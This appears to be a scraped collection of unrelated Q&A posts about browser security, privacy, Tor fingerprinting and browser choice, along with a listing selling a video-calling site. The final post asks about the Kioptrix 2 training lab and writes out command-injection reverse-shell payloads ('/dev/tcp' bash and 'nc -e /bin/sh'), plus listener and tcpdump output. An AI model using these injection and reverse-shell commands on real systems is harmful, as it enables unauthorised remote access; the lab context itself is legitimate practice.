How safe is opening any website on new browser tab?

When I do online shopping where I use my credit card information to purchase, I clear the browser cache, cookies and only open that single site. After I am done, I again clear the cache, cookies and start with my regular browsing. I do this to ensure any other websites that I open on a new tab do not sneak into my credit card information. Is this even possible or just a myth?

So if I wish to open "any" site on a new tab while doing my online shopping, is it safe or do I have to clear cookies every time and open only one site?

How do I stop an Image Address from loading in the Browser?

Ultimately, I want to be able to disable the Right Click option across a website I am working on. I have managed to disable this across the Blog Content and all of the Images that appear within the Blog.

I have noticed that when you enter the Image address directly into the Browser, the Right Click still works. I have tried modifying the Code Snippets I have, as well as various Plugins, but nothing seems to work. Would it be a case that it is not possible to disable the Right Click option when loading the original image, by entering its Image address into the Browser?

Assuming this is the case, is it possible to prevent the Image from loading when entering the Image Address directly within the browser?

If there is a way, would this prevent the image from loading in Blog Posts etc too?

Tor Browser: Could a website or ISP detect modification to DOM done by users if Javascript is disabled?

I have Tor Browser (which is basically Firefox ESR) on "Safest" setting (Javascript disabled). We’re generally scolded about using extensions in it, as they can alter web traffic patterns to or from your browser, adding another fingerprinting vector by distinguishing you from other Tor Browser users.

If JS is turned off even in vanilla Firefox, and I apply modifications to the DOM (like CSS mods, zooming in etc.) after the website has finished loading, I can’t see how a website or ISP could detect what the user is doing in the DOM.

I know if you, for example, hide an element in CSS before it is fully loaded (such as the sidebar), the browser may skip downloading resources (such as icons) associated with the element. This would distinguish your web traffic patterns from other users. That’s why I wait till the page is fully loaded. I’m also careful to not trigger CSS media queries which can be set up to connect to a remote URL if triggered (or remove them first if they will be triggered).

I think the above should be enough to avoid distinguishing myself by my web traffic. Do you see any way I could be distinguished with only CSS & HTML?

More secure to use e.g. Services in Rambo than in browser or native clients?

Same question is asked for More secure to use e.g. Whatsapp Web in Franz than in browser? [closed].

On its answer it is said that:

No, Franz is not inherently more secure than a regular browser.

In an ordinary web application the impact of this XSS flaw would have been restricted to that particular domain, but in a desktop application it endangers the host itself.

On its answer’s comment it is mentioned that is an open source alternative.

==> I was wondering would is secure to use like a regular browser or their native clients? or does it have any security holes like Franz has?

Is there an actual web browser “in the works”? [closed]

There are no web browsers left (for Windows/non-Macs). Chrome and Firefox are both pure spyware to the point where they are utterly unusable. 100% of all other browsers except for Safari (Mac-only) are "skins" on top of those same compromised softwares.

I’ve looked long and hard but there just seems to be no browser left. It feels absurd to type that, but it’s the truth. I’m typing this from Pale Moon, which is a Firefox fork, and other than Tor browser (also a Firefox fork and only usable for .onions), I simply cannot find any browser to install on my system.

There just is no usable browser left.

Pale Moon is a nightmare to use for YouTube, Twitch or shopping food. I have to wait for many seconds for each page to sluggishly load, and every click and scroll takes an eternity. There’s constant issues with videos and streams breaking in various ways, start repeating, or just generally load at turtle speed, unrelated to connection issues. (And this is a monster PC, so it’s definitely not related to local performance.)

Pale Moon is also very broken (just like Firefox) in terms of specifying a profile to use when opening a URL from the command line/script, and the same goes for "private browsing mode" which it ignores entirely. It’s basically an unmaintained, rotting mess. It’s so broken that it’s not even meaningful to call it a "browser", frankly.

No, Chromium, Vivaldi, "Brave", "Opera", "Edge" etc. are not browsers. They are skins on the same compromised Chrome spy tech. The only possible way to make a browser is to do what Opera did until 2012: actually make it. Not take an existing piece of code which you have zero control over and slap your logo on it, pretending that it’s a browser. It’s not. It’s a skin on top of Google’s or Mozilla’s junk.

I have zero confidence left in either Google or Mozilla. I will never use anything made by or depending on them.

And please, don’t make any tongue-in-cheek recommendation for Lynx or Links: That page is like a cruel joke.

Frankly, I already know the answer to my own question: "no". There is no browser. All there is is Chrome and Firefox, and both are literally unusable.

I truly cannot understand how there can exist people who claim that Mozilla is somehow "fighting evil" when they are the evil. Maybe they run Linux and their distro has put heavy modifications on their Firefox package; that’s the only explanation I can think of. Try it on Windows, or just "unmodified" from Mozilla, and you will start crying.

And no, Chromium is not "Chrome without the spying".

What I don’t understand is what all these intelligent people could possibly be using. They seem to be all using Chrome, somehow ignoring all the spying. It’s like I’ve ended up in some parallel dimension or something.

Seriously: this is not a "rant". What do you suggest other than "stop using computers entirely", which I’d love to do but isn’t practically possible in my situation?

Will anyone figure out who I am if I am downloading torrent while logged in facebook in my browser?

I have protonvpn. I am downloading torrents. I don’t want anyone to know that I am downloading torrents. I am also logged in to Facebook in my browser. So Facebook knows my VPN IP.

And my ISP knows the IP from which I am downloading stuff using UDP.

Will someone be able to figure out who I am from these sources?

Call Master – Free browser based video calling ( $10 Reserve )

I want to sell my browser based video calling website.
The site:
Call Master is a Free browser based video calling site for everyone.
[Short Description]
Website does not generate income yet. The script is great and customizable. Owner can add ads to the video chat window to get hours of impressions per call.

[Best features]

  1. Site allows users to video call for free directly in the browser
  2. Website is easy to transfer with HEROKU:…

Call Master – Free browser based video calling ( $ 10 Reserve )

Kioptrix 2: Why netcat reverse shell executed in web browser via command injection bug doesn’t work?

I’ve completed kioptrix level 2 challenge via bash reverse shell.,23/

; bash -i >& /dev/tcp/ 0>&1 

My question is why netcat reverse shell executed in web browser via command injection bug doesn’t work when it was working just fine via terminal?

My Setup

Kali - Kioptrix 2 - 

netcat listerner

kali@kali:~$   nc -lp 4444 

I’ve verified tcp port 4444 is open

kali@kali:~$   ss -antp | g 4444 LISTEN 0      1  *     users:(("nc",pid=3003,fd=3))  kali@kali:~$    

netcat reverse shell executed in web browser via command injection bug doesn’t work

; nc 4444 ; nc 4444 -e /bin/sh 

No traffic at all

kali@kali:~$   sudo tcpdump -nni eth0 port 4444 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 

However, when I repeat the same process with netcat executed on Kioptrix 2 terminal, I was able to get the reverse shell setup on Kali.

[backdoor@kioptrix ~]$   nc 4444 -e /bin/sh 

Reverse shell via terminal is working fine

kali@kali:~$   nc -lp 4444 id uid=502(backdoor) gid=502(backdoor) groups=0(root),10(wheel),500(john),501(harold),502(backdoor) 

tcpdump traffic, the last 4 packets were for id command

kali@kali:~$   sudo tcpdump -nni eth0 port 4444 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 00:58:29.307806 IP > Flags [S], seq 1943169723, win 5840, options [mss 1460,sackOK,TS val 12217959 ecr 0,nop,wscale 2], length 0 00:58:29.307851 IP > Flags [S.], seq 869624996, ack 1943169724, win 65160, options [mss 1460,sackOK,TS val 714133810 ecr 12217959,nop,wscale 7], length 0 00:58:29.308412 IP > Flags [.], ack 1, win 1460, options [nop,nop,TS val 12217960 ecr 714133810], length 0  00:59:55.154330 IP > Flags [P.], seq 1:4, ack 1, win 510, options [nop,nop,TS val 714219657 ecr 12217960], length 3 00:59:55.157180 IP > Flags [.], ack 4, win 1460, options [nop,nop,TS val 12303857 ecr 714219657], length 0 00:59:55.159646 IP > Flags [P.], seq 1:98, ack 4, win 1460, options [nop,nop,TS val 12303859 ecr 714219657], length 97 00:59:55.159656 IP > Flags [.], ack 98, win 510, options [nop,nop,TS val 714219662 ecr 12303859], length 0